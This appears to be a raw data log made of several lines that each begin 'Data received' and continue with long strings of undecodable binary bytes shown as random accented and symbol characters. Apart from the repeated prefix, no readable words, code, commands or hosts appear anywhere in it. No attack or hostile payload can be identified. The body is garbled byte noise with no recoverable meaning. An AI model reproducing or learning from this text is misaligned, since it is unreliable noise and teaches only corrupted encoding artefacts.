Data received ՍQê¿ 7Ë&÷Îl/ÐJ2sS—×]vA4pü–”‡ 'ôM\<z IŠòÝq÷3eH_ÏI°‹ÿy‘{øÏfÚFòxrv#˜ÇôüŠ¥t"zÀ„RÂÃHæĖnb9jÇn=õ7#»Ž €ØhŽý̘tíÎSâ)Ϫá!Û§E#|å^»¹›¯¶X‰¸öK<oš•4l8)˜½µÅäãljk^”û¹q{-Ϥ:~ɯ»ËÀF7¼ëgu£”µºB½­,°ñZÉwT”ÛÆȏ[œÔz“ðXž‰bï ZnÙ= ]jˆžÝ ¯Ù} ^=ç©|÷—~áÝÛýþçø+v¬)§[•Y¥Zøê~6š®î{†ÏLn¡,ÝUn ›³êƒã/)»¦t¬ácþ<?§.¿_C^БG±TihHÃILREø~Hû AÎÒjìã;@yɁ©º|Ö}ʝõbΆá`Fso:¥õ`iø;)™‘ÂY+˜°‹6šù¤Ã˓¿]éñwæ öÁä7Ì¡ˆZÜ(ÙÜ9z%- ÜC˜¥È¹ç­éK|«8l¶ÎsÆ~ÁvÕ¿Ë[àdH™ú62·VdT]b9ç Pïýt?rÃpÄxu¥­CëOp‰4ï’#soÐuü1®&«Xp”\=u·QD"õ‡ ŠÓeÈÒ™–l»œx‹N§MÛÙ,ªµ¸¿"+œ> ¡µêQùø¬}þúĶ! ÿ¨¤¾2”­b[/§WÁ8În‡2ã„ŠæÜëϒ…uí¯ð;·æ…©œÙ?Ì [²î²Ï°u‘é³j:ü×¢k~ðóÕ)'·&{Šùlµ·Õ 6¿:ßù̜vgdX{Šè.²øÔ_^0£ãӊW,îª\t;<¥‰Žì|OæÌ·‰ ¼œPB9餞~zLH:¦ ©¸š 'Ý[¨F@:Ð`; #÷³'¨PÛ¾Ò÷¦o@†ꂢ‘9tócŠˆeõ¹q¨‚1ènþᦰ+±iD³ÔuV²p5ûÙzæçÖÞÐãw®¾,ŒÊÏ^)V}‹9ÎEƒÃxÜü¡3°£½qÛj44š7y%·…)g†yÐæĪª&õœsÜ4Jr÷®zÒ3všž%ƒKm‡–¬`\áætÚ ø}˜÷º†¸^‚j…’èªí÷Z C¡úTb– _¯í}#Ñ{pχO”D âú”\Àõ‰eÕIoÆ,£Â¸w|¼FþYsQmT,E~©GeËE¸H[?ô왃ʊ [Öֈª­ô1H»œïÇVwlƒÝ 2l¬°ŒŸgï7†¯S7“q(.Q²ËBø5ðþ8­ã[Ayæi!1"?Ÿ‡$bªçÌrís—ÈânŽX|²“°¯’Ñ^*ÕÂÉ¥Ó}±™Jì&âR˜{ÊåÆ"Ýò üAø]‡£íÐÆd0ÎR˜PDÛO…÷Š€u¿\æt܅¡íÂÔ׈(øú»ñÍîvñ+˜Ô®y^2âçZ œ76Ý +J¨‡üºp¹U³^Y—ý~RPV?]R>7 ×Þ¨€?<æ0L³5Oÿ‚Ÿ·>Eætà[kÕ3ø:¬‚œˆ´›^ó$wè2Un¬IÜeÿô,B–½a™€•= KΊݎæ|éÅ'¤¢7$ÅÙÞCœz`ÉzK ÒP¢•½áïiÎNÀl97:Oúõ&Ù)hۈÌG1.ð-êÏXŒý΂º Ï:ÖxºŒ>iå8v1 áyOsGz °“hwŽ¾Ò ÿ¤ŸðA÷6ÀË芞ÿ"øLxQ ª^fVU<ÿÞÁ†S‡ô ÷
Data received Ö¦˜ÈukÃ;䫸=D[÷ƒÿ…Ýe¡ô^}a¿iÂW²ªÓX|ÅÞæð!cñç²a¨“S@ÑüÕzöcðs²þVŸ“mp²HKÞ¤'çžÔ@ØˁK¾Û?‡0ë2ªfÐ^ažïxü¶®ë»Ù"ڔ4Í(Ò@c{Ü^½ÁÐO¿¡fH¥z•Z¡U}1ã-MÚ<l&Ôúm…]ÍöõvLê¡IËkªO?” Iµ˜ßEQ鏴™Ý©pº¨0åHЭJ3Pè§ víÊ%ÀÃK<f­¥ikõ¶‰çî~Lócÿ¼‚!D.³›e¹ٍ~'šÚ脑Œ€€úû˜Iœ7;ŽngH:bñ§²´XZ»ÿÚ=ƒ êÿs»^#wÔ±Þ·(YYü’'JíÁJmjë`™e[ßEð×ñ¼(ÖÚ-ØKØÁÒm©Òñ*‡•Š‘"±4hÛùnl²­w˅¼ðÈ)–Ô„Äš ¡±­ê‘Í~fÑ6Ä|¤(;þ·&ÿ´X¤‹38+dÙ.k}­15~ìÙr{vñ}c!ÙwߥÐeõá.Hå§ØkÙ'¸´`˓’òp*O•ê²Ö–w–zþ1mdƒ­Ï/­™þÅ÷˜È>5âíBcøVîøØ+wÑè …›å6QõŽD´gQu´|ⲇz²´ªlh¯ÃÉke¯”obc? ìœ^ MPüc¨â ®›ˆ#K ;&[Ÿ/ôžN[\º¡4§—ôˣϾõŸYRØ|Ø:ðJºÑ\n©:Š"1`ÂyÀ%m7š÷ðàÉ®¥5A‹ðÍùÝ_¥JÎ%4¤2Ï[êÀçeu°v{1‹Ycèèח@`Ä@9&UŸ×c‘³1읦þ÷€?¯>¦Šó[x¬k>OYS%À·×²Í† !f›€b\GÒÚ.ß©šUQßòßZ¤±gu.,ýfж¼Vô˜™‘Ÿ]B6fÍÉÉW3렉–ÂÑؕaÍè·ÍZ Y²¶dD£Y‰œ’‹I|¬’ˆ±r׋­]ݍ4Œã×CÞÂm0r“£L‘òCa<•!;a¯›ë‰éîÿ¹òÑÌÏdfTfxq°Ìõ%ÊqµI÷H[@¾ü¢â,q݃¯U‘ÞAÎÁoÝ8H¢àdÁIoF²)·‘ lÏï[¿m¼1\S8—}˜la‚ð ±Áí8tŸriÄÁ_5äBVÚ?ƒYr¹\¿,~óÛRÔÉ`œš·’ÒIä•A`?¡Ö|¸~^„H‚º{”£œQè1:«ûՖoš n˜×¥‰FbŠQìD·aqãeµ…-2=hýˏtJš#0‚˱„ÖçHÅÃò¡áñ«vê üݦ^­ü?"r‘‹ë'Æ« ôå·©9g—ä¦RŸ‰â4]H‚<—ù*,ùÊ­ìÐôÏYêŽ[ã,¯àŸr´½Û¶‘°-3^ÉêW>Á7Éùµ?£ m*¾^9Úcø3eøã¾þŸkê<Pú ÜN:@ ¾ŠS÷„°8„Mtàc9F@à]ø‚¼ǯ@h[€«Ëmäûa±G{B–!Št{\P¦žLx¨qPù_NòŽÐ‘_ýõçÈe %gKRJ¯²Ÿ~%;œÇ«P38‹7ܾ|À&’Jüœ*Ân'³Í}¡™<(¥-=i\(1‘ëbÆä´8A±%ÁSi=/¾YWímýkбâñ’hò,-5W ±95îj(…ÇæÔâ¾bI%daE6—.¼À…k£ek§êÙC­#‰$õ‹øÓS i憅ø‰Ç,À§és
Data received ænÍ&Þ¿ùÀ@ß¿öø´$ý9vWÐß/n‡U!—÷¢Ë;4Æ)1â&–î¥ o‰´Ü˸õVk7Ó¿ùÔcªÅëǾö7Ñ\fíž6ÀJõëÏ£ sé ³®#(“aôñF¥¼übù?[Y,vÄó,by8²\\*e»ÉJÄà}ß @³ª¹}gÒ´y‰ÿtžd5è]â‚õAüg™åÁ±˜ó”LÃd¼R_j¿ìOþ™qƒjßm Ío÷fÀܯª÷jÂz²ïñYû;š}Šˆ-)˜‘í)Ÿ±Ï¹šÄ!îØäÂ”&®”Ÿd¸8åºoä1{÷LInyÔ¼Š™´îš*#%¨‹OÔºP÷"&áA„Æ>=ä%z˜þV¸Ú½/Õ^GΊÈáÅ#X`6X+²IÇod¬¾ÆŠd®ëUth !›3T€#Š‹Ÿ˜É<. 8#X±Ùî˜1Rz.Åíjûë´ŽJ <œdN>™tôjÂû-ɽӏ¡üÕ)—Ž:Vî>÷/×uvÃô`<‰q¬•(×=CÁi®¸ÁUÀ`šÞÐ MÅñÒmªŒÌì驀-ەh›€›QOUî.x4U"Ò§mp³N@ãwãÆÓêP~dúØ!XûCåS$Xl‰A?ô\ Iý³ûÛéç¿lxPsÙÕ~¹±ú>ÎÒ{ý#¼Ra£þ‘qêô$òh ®ëðû§*ŽÚh¥•‘lO¤’`+€?.32T‚§·`¢£.{×Ðx3žáØê̼" °l׶"Š$zC…£œkl ‰J4¯ŸívZ¼qpå>šSGÀk‰|Z—Ò’Úq¥­AÚ­Ú[ þA‡Wl”eꥎՂÐp~Š\ˆzÏÉ%h9¯ÂO±¿Pdí|#8`åû;Žá‡‡a‹\^Ž!Š ÷ÿéR;}E(K*¾MÕ[¯‘†Ð4¹"ùà¬8‰¹k  …oa~ác_2WjÈv¬d‚uü— ÄÁ¼º|]ÂÄ®ïœÃaá·8m<sûü4›«æ3 "î¼»/©œ§Pæ¦ «V@7f¨9¿I—#Õ½ÒfŒ7Lç93¶Ì’’†Ö0~­çu ø/%–,Œ|ÖäÊõ6)<V|ŠA†yx”}b?X¯>š ´pÃy»e(îç7È‚¬ªŒŒRÒçÙ&¨$§Þøý«68ҙfâgÍÙ £ ³úÌüÍ£^"áP¼ã•`ú·ºo²Ž¶ëãUVÿ–žÕ;:%<o|Ü`є€I³ëËô<ä¦àSoo,Uƒì–}¯žff“'ù®HëÖÞÔo3Â-4CaÐL°Œö”Ï—¸-âêˆÚkt<I)kÓíò¢=dŠB…³rwNûÃãâ óê«UՑ¹&—£NÀÛ=ÐVg‡ðŽ»Ìe­„þÏAŸž{žP௔X™BƒzHQºKèjè"Hӆ+—6Rɚ^ûç=Ì$¸)žÒŽÝ,§øÏP1ó‘úÉ3PåK·&ޛ¢ÉގЯ{•NÿTg¯ÓZšöÌn:­Á äA‘ EÙ úʦ9ÎÓ VÇÌfIz¨®­®„-NOªŒ™î¤Þ¼Èxô-—!ÍM8Ù ê)Än¨çn¶lM¹C}mk?9Æψýç40·n”:·8ºÁŸÅG‘ÄTæZ=¨¶Ï.þ¢tO³j7þí%éí¸jˆ-t¿ßÚIJ@<¢WžlJW)T+Ú%wôš÷9» ä?ǞÄÔZÁ^ìõ)ѾVÖ Ä@¹kÒÛðxÞä ©Qg~nkÓ7°Š˜ 0B?QÑ
Data received bì¿^Žˆÿœæ‹³à}É´Z“ËýϏ%;<õ ŒlW›iµ‚&ÎêÛÌ(yÕòP?œjs eƒD—$݋Çcª` 8Îß*s€¯ø£z6Á[T[ÕÌ´#ÆÚ 2xÆd£ ð…úŸÚø`œ`„e#éüR\óì±.Ð%ŸVæÃ/§kÁÿ.ÁðònèRï2´ãôì¤U‚8Ìcs3»‡ˆk¯¸í$uÉv£â8¼…ˆèšüs=–˜ãµpú룃£› Ly Ö5‹ªAWäq$Ç]¾ HžU™Ý|~ø¹ ä­±koïÌðø„[ÿïXk–/Æ o¥Uèqí”ÿÝ*AeÚÜm‘_:¼’GXvâ*Ô?Àbæµ¦ÓËÐ;"€¯òÊ•ø½¥7I¼ðùXž|E ê^xW‹%ÖY#‚@ì»íhþ¾}eʅÀÄa(pò¢k®vNØb ‹°ãà´1Ímåp7ïïŽrEá “Ù»¸‚xX.VÇÍÞTÞ_‰r…-ŸXӆ Á²N¿ 6¹ñÄ]ª YÀ& ú{ટ~9îÇnyÚÒܽ+jn7ˆ:IõHÁ“´'­Þ¼SÿëBŸ9Æ,F ûR Þô ¿vÈE9ÑّöW)¾·•ÌöÛ šxÔç*ÍÍÔX’/Ü燋e¿çâÒ ¬µ0KÖÝÙó€y,ñVÛ+A­‰LZÕ§·:YÍOèi6$E„,ÑÜJ þÝ,Õ/»œs\1æÍ žõC&ùJÝ„`uÄ=¡Ò›ªŠù,í·vǚF•<èPùfIä•H Ÿfy„«öF©ªEè#M_3yŒ4ïPÀ=ª²ÌÌ5õ=¡ØÂÝ!ŽÓÖêàOHPèóÙFœÛ¨•¹šñ¹G „Õ¬ 3$È]öß`ªøMAÆØ© ƜÞ¥á&êGü÷ëGú?ÒêgŸ+ÎÁŸkÎP,=gˁÈdŽm4Xä2WêYr­Ü0ˆ¯ ‡pSÅû^Âæ=@³ÜTŠCŠ¨óoñÌÌÕ½&…>cU,õ⫡ΰ[윀_O ͍¡¦o€ÝÄrz÷“zض’Ç¡ôσ×ÐÓǔ?ó¯}š%ìKòñüʼ³ã'„>ÏÍB|Ç›b0dw*×µü7¿ ±7™ó¿í*zfáPNìÈ«vdóƒÄé_€­T«-û!”‰Ü',!-™c(3Ó,—q/MÉþiÆ¢P蕤©­:åä]PÇßÛ嚝±3MõÈ#èëC”ž,AÒ'¥[lf>œA·PYž–é‘^ãî©XDºå½7ë¢Ú¢”•‹ kPÄ"ÓCŸôyî+wWͦÄÙy#°õcSÔB-–|_(ß‹ÂŒ[í Ö¿­ª¡Ï@a¹Å\/zy3,[vÌÆf#P[5G°(±©Þ À[ÿ€Sª¯ò^ÀȐ Ãª<üi„iØn7¯ƒÞqaU,Qqlc«û«E]Å!/愘”¶“ŸšôC‘óPõÑ߶t.´ÆgP FÎƗ ËD§(ûDŠËå#·Øy¯õ‰RŽ|ˆF?”²Vÿ»Ø[}%#„”ºi Ÿ1Ajùh¸{dE*†d2j%§åìo"­d೗掯¦…ÿÐw6”Á ¸“t2©pþu!ù×ä Ã]¨‡<P”.›™ìþö¥Œª#O×Ù,h…±šP xDsŽo@­W¿:ö®UöÚGì‚ú°æk]pl=ۜÊÑÄgF*ªý‚œì-ãڐêhuOæ@™¥÷²hêO)3[7Ùý rÙo¬ D§3Šó˜Û3
Data received &`/5(bÙöHí¬^;½[Ú=9;þmÈÇU¥m'œY™¸¨ÑµpÀ(¡]wÉØ{C“Ë÷ÝאêûՏ’ðäem°S,NÃòLêÛôÜ´w¹§4Ó£X„ŕݎ˜ír|h?Kêwt`§\Ýúœï4òq6ÞQ²mXrÍÞhœy‚6IçLþ{„%Ê‘¨“!|ª¶óãX+± íl’nƒñö–SÚs[¹":ÇÆÔ[w«lÞ[8¼¶÷(vÖ«VbíË"4d^äf“½ÐIéG„])yrK˜ÇèW::~\GÏd€ºc. ƒ}ù=BCh±—Bã˜Ã:Þ¤ò†(€ÚÆ,'pº9pµyò»±lWÇ;ÈÒxÊè@«¢œ ‰æ?:ÝuK@GÀ× þE±×cú;"<e *ï¹þ©/ž´á™§-5Ú ÜÙз†ª4~}±³„òž:ƄÖtÞëóFù;„¾2ً$¸‹ä¬Ë²: P:„]ܼ¦ûØã¶Ñ¯¹§3H›Â­`œpPƒ÷ì^0eç{éߙä¡&{…hš­¯Œã«W‘@Y«M¼ à²ÐÀåo´’gv4î~„ìd½~šo×,Ã*êÅ10öq%¡{.? ÍRÏmp3¹‚0G5í¿ý³ÿJ¹# Ö»bÜ0oÂKÅ»8Ââ!| ìÁúÎõ7c3/´Ûáøù'—ð[+Յ”o] ßa:˜(²v¡q‰ÀNJ¯*ùU‰ša‰eó@÷îƒc5ýpOžH` š{9Ø;àTÔ ¤›ÈO¼< /ÕùØ⫘t~`–cã…8)r2ƕ±‡±\&™”>‹xŠ P²Ç*f±ð µ‡³£s 3.ßÔ¬;kZuŃÛKãgF¯Ž¬¢þèdª™$åÆÖ|PÄÚíàÅjŒ]ª¬ÔqÌÈÝ÷c½À'`”Ö?I×"YƤK £ìäq½ôX+á~Ø_³ßf§¦¯”H·EZœ‚&܏;€ KµêNôµ/GO–ÈÒXë<…xäû¨db¸ëv±{—ô"MåäÊÎÛGòôC 90ÒEíЃZ ¤]pc»Å~²øM¦GWGC 9muºÜ4Xô:úiðrL´Î'C\ÛByßW+)Hf¨ÍÁ#ÍCæ^ G‡ÞÚL­³óˆ£3/¶R˜Ö’“"|0pŒ‡$æ¹¼Ä݃y'ŽA“ˆ»3pkMŊ¾ãUcß¡S‰KÖ>à®qG.âF{ÈöŸŸ• èÕØås;@S¢vŸú¥¬a¾ÁÈà^Tbwì|ÂvÕáxȍŒûøu}<0äŠÊn×wUÒ¼þZÕaÂÚP÷ø6Üf°ß‹[ì½áK¸Tv„'P=S$>ÿíĶÍP6WþÝ9mBK€sÊÞQzJùa¯Õ¹MÎâP‹† ˆ=eAOÇe°(Ñ'M4•òÂ)ÌÛà¤~•¬óu(4XÙJk 9X,Hõ04÷‹h½‡’ 3TcGü–6ù§ƒ1w¹)Ó>Yö~p¸bŒ„ä$Î÷ý…ò6¨cñȂ!ÚU¨$ÿ íý‘ ¦:ê*ÅAmfÉ¡UrVϘGä·Óö”SþÔþ'Å^@ Ù¿ãäÜM»zÅeÙb}žŠÐyóæáïXͤ ®MµLÖ¸é }Zù×-Ñâ•ÜJgsªÜÆ1lÝÓ«¦¸·¤•îª{W㠟‘(7›89 ¹`Uâ–o‰²CŠ/oI΢¾lÙH·“­ížB7ên\,óJÛÉ9#5Øür®»ÛBAéímW‰ƒ
Data received `
Data received Z_M£é|à&s0;„Tl¯r‡®-h•Ày¢¤qæÔz•€–õ=g¨jKRuˆ3ø£$‡‘xSVbXÖ«ŽèÈb¢hÁXôÂþïƒS¯z^ïU3œâ“G¶RÍjlaçEñÆL •üšÜ'Ùnƒ¤à¿¿‰vkSõEYZ/Ìie/~-8±Í%ɒ}di“¦˺C£ä“…˜ Ém©ÃJÛ֛߫QOÊ›21¡¤4*Q½RY÷0=ºþE˜3ÐÃg µäö:O´R±å‚»Á1dŒ¸ùA?þtƒ©à©kyøªî©;¿Y¨ò–ñ§2°Ñ¢Y\2zj­ïÐ$ª  ÚÿXj qªÀ%˜¡ù¨r M^`˜Nóô†ÀéQ`~ƒMyÁ“;睼ÔPû ¬‡¬s;ÂxÙÖqšÁq¤Z]¯M]è |çö±Y`{êiÝØ·*u[8íE'gÉÑg>ÎP] é-}³lbtÀÙÿH•ŽÚžy!1 ê.Kjýï~;KŸf+Í»—Ï8£tÇÊÃ,o½åäì૵ԝ€ìØõ©WXꦨ˜Ôo’5|;ëæ½9ñëäáÃÄ»OHšØLJâ6üá‚Ëq.Ž².‘¶àvêû:$%±j>žŠOxÏîxáw·»i¢r¿µ#:²l»T½‹Û)í«¬ ª›"‡=Ë ¡_%¶¦ˆ·w„AmÀ0Sď¬q|ƽ„¤\9Bá4³Íbg)qkdŽ‘Ê7šH³ÐÚÆÑ;»ÞçlWȖŠÀ׿¿ŽH@~®vÀÖ …ÕÓ'ޡԇ[Úúy›O͖3>ýïˆiŸÂ9áÃh… bsIžB•Ÿ3q+²À wŠ“/Ô·…,/lIÜzÛFÁåÕõêQElÔ#¢ÔþÐ%µ—Y@mC 3i¹Qh ¬b“–¤HJ¦¡ÖfUÒU¹»PÕÄMÄK·žÞ3 æ.$;î|j]( ÕYB‹<4üÊGCIýu:¯;mn‹]jág›<™çì£å]„ñ–q*½êù(×ùQËý1ÛCFà7cÎõö~v‡\'²øºç̈́ùñ7œ™"¿æ×é>…ÕàFšöŒ+‡wÆõªâ¶Ét½ý 5¤gP‡|ͯbë¨]K´å•³bzò8›e…®=üž‡‚skëíü6$[¿N÷MoèÙ=ÊJb 5Ðr¡@Uö;u˜Ê‹„?Xê+aoä‡ã»î¯Œ˜:'-‡?IÖyöËr¾]¯iÎЫ íg,AŒogÛOç=tûÎËÚ³ÖkΔEnÊ~ä€yZ;÷灺t”8¯¼¬2ýÐà 5[HFm;ßZØcŠêðç)ÜíYÈ'†›Ô)¥ágÉõ¤Ò°ctþEÞí1“6!Žš\IW<Œ–˜,´¢ûÇ|̐ũuÌê†0·³Jñxó;µ0u¶½ëóôðɵñþï­>ç]ÜrPT·Mã8}‹dÐ÷‰òôO¹ ÕVð‡ÌÇjÄeš8º~ µ‘ä[ám(N’jæGT6ϳï¡áŠƒæNؐôe}ÛyÊ}•É2I=É% o&Xƒ'>ç­,»+˜ÏbʾZf³Me]‡f 3l—Ü€E“•KµÄ6ÖA…¬9ÞȐ&OŸP²åÕêßþ›'\šy'#˜>6Œ1M)3:aÀ­‘"Ɯ%÷Êî7xöÁÎDw¬ÑÍÕÂÅÀ´)¾+E‘+Œ Tpù·Qª?p9€¼1Q eê>iùWk»Y0ì¨_U'T7 ðõÕµkòz³vZ
Data received ‚µÉb˜y(y»xù£šÖkpQâÆø ßצôHpºùGÞÍx4=PórÎ8¸n|Á]ÓÜ¡*^÷o¼ŒNÄáÜô¯-·=~&C¨%µ‡êÙiQ$$ç>7Ó&1ÃÿdD/3*>[¤-@‘Ñ.YhÄuhܗ»AÊé;MPqŒšÏ"„@¤!Í¢§‚6³ò/ûgñ]~Ó¨Oâ+´f€ÞA¢ç ð¨#8aÚ!îÀ'‘û³xY&g³»i­~Á²<'¢¤0°" i½b^ÿ‹ÔNÄ‘¸T$MþôE‹°6­†‡Ý”“Üõí&¼Wn<ait¶¡£;ÆO»æ´ý‚’…TÄòÕöj`‘î}Kŵ6ümöŠêϾ–G$ÝY¨œ~–·—EŒCèKTŒ}µŽjåxpÝêð%ï‡ã6g–$ ðGs¸Vhå’kaà=»û‚Tû¥Õ}S+å^#Â~U1¥#½5טMU¸¼Ú4„ÝÇ·?bÍÂÓèã³aÀ^ÅØq:¯Öá2¥ùäèîÖԌ[i ´ˆ}%£ÖNõ>AY)ÓjlF»1Œ½ŸÓ ‹×ÞâÎÉîö!t9ôÿ¸¬”ljò^ ç :Ù^X7¾UZ—yÐl:ÎÀu ظV(’øUúO­À„fnu9Øñܕž„LÒdXGcç»4Ö7a7U„XÁÞ÷ކ¾„•ìA$Š.¬ Ö' ¦ >jÝ0ˑ²ÿ;MÔ< P¯«;“æUEA)ÀIuSVG=.ºô=îd%U(^ºš.q27cµH.“‘äÀæÒ¶0ŒÙÛ]]Ç98ؒ…þ}¤Íóö•¼úV;=qµòíŽ"^ŽGñé¡Óù"ó?÷:2‘Xü§H¾m̗ E)ß6kûNHvF—X’êBXÓE'X[Ûl2uãYOT¬ùÄû3`kÓDΘ$(÷9w ʅ€Ë¡%ÉtGÝ?ÞÃW´[¿¤wUééûpšÈïõ«¯ª¯¸{Åç@õe÷£â}«a3ª[<×J¶>~hÍkDuÊouS®<™¤Óvû¸SdÈ~žè'É -m=Np,ÜM!0îTéç‹ß:@ÝCÓ¸+j[5É3"°×³.¦ç û¡ÛT­# çüŸœ; [S1Ù ©1õ÷G jN4¬Ê©® ýiöß9`ÕI¦OýցZqQ‘íaa*ÑǓ›yÇ]¹–o_['«¨Ò8‹–êûÄñ¶ýetpúKôÚl+â5Ç],÷Cì”ÕÛЩªdFu@ ÓT`‡Ø“;†?ÿZ·Ö¸(54²m2Æ^C Z\”MÚËÙÒ'V8hK/ܳ×#`] ûäJŠ4!6–º:`é¶÷ôk¢Ì¦4fX•èòõ¢hÐOÜTRšzÎJæJÍVþˁd¨§ðcþcâ&eê,îý6אÒÆaó;ìàxß±š½ŽU·£àh‡V£ ƒ§¸R¦peFdéF^–¿Ãåùw[ ªØÆó'#í¨?Lҁ´²4ÆÍÜG nµ38θKž.J¼Œ”3Ìj£º«ïžÄ¬¹Âl›ƒiÐé&:v(Ž{kŠ c*Ì •ªç÷åÖªFrùG»$WoÕåòûCz¹Äs¤LÜë†óøݎè}´r̆á#áÄjº»Z¾Ñ|':„IÛâ*zlNš}ŠÍG.Á]CÙÓCÀ(ZvæľÏÍ·ã] †Ï ¼junK±ÞÊEkgýj]a #¥M)m]{ûy:<#ŠU–BÇDZ¬²ÂB«ìpxÃs÷‘¿‡>ï!
Data received `Ê×d4°ápŠÃí½”Y@tdM6¬LÏ ukèÑã)-dÐ܀ÿ„¼›Š<ÒQü0Õ¹ÜÔn—œ6fA¯1íÚè’Õ7kŒœ‡'æZD³¸ðƝ“QK»ùzI ~š¬Î@ _í}Yó¢+rFB"§U5ÖJŽ±P3Š2Ž€w"Mõ²ÓÜ®ŸÛE¢“1¾}’Ó— ‚Åö¿r ù‹iÛ0<QLDёM‰³8³j ^ ˆØ3¡xŒwg¼„ÙԉÄ8Rë0™þæÙFd̺fïîŸÂ+‹R‡£çEXÞ"ì ½vk$‹+jœ ”È06f` «¶òD@‘º[ˆŽú­ÑxYðR˜€m©dý`áJƒšÅ)ΙåÃÓ.ãÐðݍár¤”½¨ At]¾¤£ø“ãцŒÄîF¹1¯¡sŽY£¶Â Kž&¸Ú³ña>.XGzÜ¥A®1-;Ñ*¢Rl¦_Îý~ &U£& +æ‹êmLÝ þ$=@þBÕßûxÍo®rR_¢cr±v~`↗kßqüAöÁ¿ž7x¶¾3¬ËÆÆÂö…]œI ÊÃã:Þí䐇ÎÿÜÇâ$•V{+u‚h„B•ymýæ›>|¨¯«o¤Ä/U×.þÅ%FLZfÊs Û )Žô X“s—Ó6SÊcõÙª #s°y/Kˆµ»–Èé]oÍâDÊ3ÚBE¯,àѼµ,Dsày«È6ˆPœZK€ðØ1ؾ®ª*ßÝ¢ÿEØ1qÍ /B>Hösƒ™/ç·ÁwÍDœ™“ÚÖÕmHà3T´¸·¾%9·î-uÐyVþ¶Ñrž.ÂQMôšÄFg1O\×äC‚¨;Õќëô»¢ $yJnê¿©7³û­Å! *A€Š2ó]µ«)·åW™›±ñ6+µuþ‹íË(!¿à€²²‡áJ¢^{XÃf0U„µ= é%ã•?U’. Î3G£2’e4Ñ;ldrø ü‡=ñz¦Ÿmæ&ÛLº}û™F́í#/KÁ!/ºÐmA7ðÀ˜> ˜%uzù ÊHx ٔ™“µœõadŽ®…äünuªLeDÖÔn4u5э&vh1ˆ0÷‹N&XÎ*ÕÎqçòÉ2úh·[îÄû:¬Ï¶Â©Öáh˜¤xD±Ž4‚soÎÈOYw”@4Ù|^qq2óVlº_ÿÿìµÑ*Ýu·#m¨W9#ml$ÜË_dÚWßp|‰\úp¤©!ìž`îÜš'î*ÁîÂ+¤i^ép*n…‹kgEÃVRÓZjMŠø›kx+FÙ&éÚ*[Ïíb:ƏlsŽ‚ƒ¡³úrÁ•¯»>:¹‘^ïõ¶Êcµj- …íK£`:º SBxü¾n0ƒi#©^ìFxøE¥æ´³Z(ÝÁÒ[è07þ¿¡@çG"µ•txTÞ{÷XÃ+  Ÿ÷5þJeŽÈ÷Nø%0©E¡¶î /ilÉÖ3¢P‡¬Œpm¨ßèö—ÉšèW5_Ù{_®øJÙgAü'¢Äábzi¹šØ¸5í" Š1ôˆU{‰/z™ì x;;ðÙî÷ýŠqÈûÌ´ôèê;i=ÌE\¾}l°°³Hr3þ"C™‡”*¦rv"‹I}bh2`dyȀì2ì¹kãÇ Á‚\ªMd@‹–䛟ìÚôI²Eê2Ù¿¡W€`c4ÌÀî-+)ý*Ï9rÇ^“tÅ0çaæ>8ì>uóõoBaI§!Z½†ç¦ï…̬Ja€‡
Data received Ê[IÎ î?¹ÎKQJ/y•ù\;%´’Zjv&éYl·ŒögÒGõêö&/W^;|˜q͈ÛÛgôÌ;ŸwÃÓz ³KQ ªek¢€*˙]{x,eÁÎàÉK4ˆªˆ9ƒºPʈòi À)}úë<»À°è¦¦Ýx°§LÍ×;>:¯ "õ$Ý´ð`G?™¶þ>$À¶»:×Êúÿ³ _ó÷½~ÿÂÔZè¹ÖŠ‘ 4Ì>í,ý*ò$…AülŒÕox4s?'X·ÕÑáàÈ9ŒŽÀ•^‡s?rÚÿ’À%ÒÃ't¿ÂOÔ[¶èò*l­_6 ìÈ3rRIä¤E … ,W3µÚ˕$:î¾ísU!¦û"7†÷Û Ñ âûÿZ2ƒò+ö™—89ß{Ûó= ݖžö2iZܛZóV¾ŸãýƒŸ³$õ3?»ìz¬`ù¤Šûc +¡‹5“ŠNƒÆY\ïHïu 2ÅÅɼ,Yt'Aioℍv³…ÐŽP³ø7ÏL„A`<3Ž4‹‘ÝG ïª VÎmådEñz“Y%"ˆñ¥IÖ#\I*b„îb&*éؚ¤%°"z÷tôã¤õNä²E†ÐAø›h …>-á?>Ä۝Y XyœÈDµ;WýÚсì¬DRbè§Ï¯Jlûî P?ü= –)zMèϳSn´7H-IyˆuxvdAG_’É.VÙöw]ž¨àߒZK¤"%RËØքš‚¾¨ˆó«olØ©Óx¦)|’44ÿd»} °3E&= Ç´£6£âÌ!uB¬àšRqEZé¿û•ˆƒ»p– g|Ë64ëY=ÇCé‹&.P:¦ƒçíS#³H¨­ë‹Ú3 Ï³'{)õ ãÈ­¬§ÛÅ܆éh«ï{F¹®ÿœ"Š-„ë3óMˆžT ã&‘@ÍúErprτBþ¾Ó^–ß•6‰^¡•ïè ²ŠØ‘ýwP$Úo.hè÷fÔ`~ÖÐJð³§T¦¸ÿ7¤§«w)÷Ìøòî=,u(±êl|cûº™ë!~’E•hìýsù<Rvß4ê0ÃBÛ2ÁNgÅâE5Í:WÝI•iV1YƒsQ;E@QҁJW‚2 !ïðbêþNè]<Òg¸´•"¦¤#@ó;ìó–qPV©ZÖ3G;ÃÖA£+Ö¶ªöçʈb‹&’jk±,w_™ ›¿®ÂÄÝAvžæ>—‚\8o[K(ã476 Ô)n¾KêPžŠìyg0H‰©L!žRœ˜¼Ïo5Î)¾Ý`ËÜÜöä=‹ °ùۀ³b vgßz+¨xV'èû·ñ¿ûš(›5K6ûáQ§Fh·ïjmÉ5ïƒ8½eÉ=Ë8}Þb•Tg:ÉژĔýºñüÕ~÷òöÒê]Ÿ@qä³+v-K‰í´9h‡ÊÎ#GNåºÀ–óõ^`i±úµ5= zbù¡älF€´§µJc|?%4t•r^Ðψ)F#—p¶±WÃ4m¥Õ]4¢o‚ÒŽgj‘ËI|û”W6.÷/)9b‚㧸dSCs1zsx/X:ûÅõ3 /Ÿ?«œén)Gÿ²FÍ=©wY´æ¡`ؗ’¿7Ù) ñœúqÂiÎDvJ^ÂJ€ºu0âÜÐ¥ÝèlÎ ×¥k­=;N+¡q ݨcÃÀ«2;ò±ƒÊšX`»™eì‡Æbw² ¥˜þÃe#© ÎÜïhKŠ‚·Åƒ¥à>~´dYéüT¿8nÏ.98
